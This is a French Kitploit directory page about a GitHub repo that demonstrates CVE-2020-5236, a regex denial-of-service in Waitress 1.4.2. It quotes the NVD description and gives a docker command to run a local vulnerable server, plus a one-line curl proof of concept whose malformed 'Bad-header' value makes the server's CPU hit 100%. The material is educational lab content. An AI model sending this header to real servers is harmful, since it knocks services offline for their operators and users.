Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-5236 — Waitress 1.4.2 ReDoS - CVE-2020-5236 (Exemple de code de blog) | Kitploit
Outils/GitHubGitHub/motikan2010/cve-2020-5236
Analyse des VulnérabilitésSécurité WebApprentissage et ÉducationLabs et Pratique
GitHubmotikan2010/cve-2020-5236

CVE-2020-5236

Waitress 1.4.2 ReDoS - CVE-2020-5236 (Exemple de code de blog)

Voir le dépôt
421il y a 6 ansPas encore vérifié
Site web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Waitress 1.4.2 ReDoS - CVE-2020-5236

La version 1.4.2 de Waitress permet une attaque DOS lorsque Waitress reçoit un en-tête contenant des caractères invalides. Lorsqu'un en-tête comme "Bad-header: xxxxxxxxxxxxxxx\x10" est reçu, cela amène le moteur d'expression régulière à effectuer un rétropédalage catastrophique, ce qui fait que le processus utilise 100% du temps CPU et bloque toute autre interaction. Cela permet à un attaquant d'envoyer une seule requête avec un en-tête invalide et de mettre le service hors ligne.

par NVD

Utilisation

Lancement du serveur vulnérable

root@kitploit:~
$ docker run --rm --name waitress -v "$PWD/src:/src" -p "8080:8080" -it python:3.7-slim python /src/server.py

PoC

root@kitploit:~
$ curl "http://127.0.0.1:8080/hello/hogefuga" -H "Bad-header: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx`echo -n '\x10'`"

Afficher l'utilisation CPU du serveur. Exécutez docker stats waitress.
↓ Exécution du PoC



Références

  • NVD - CVE-2020-5236
  • Le rétropédalage catastrophique dans les regex permet un déni de service · Avis · Pylons/waitress
Télécharger l’outil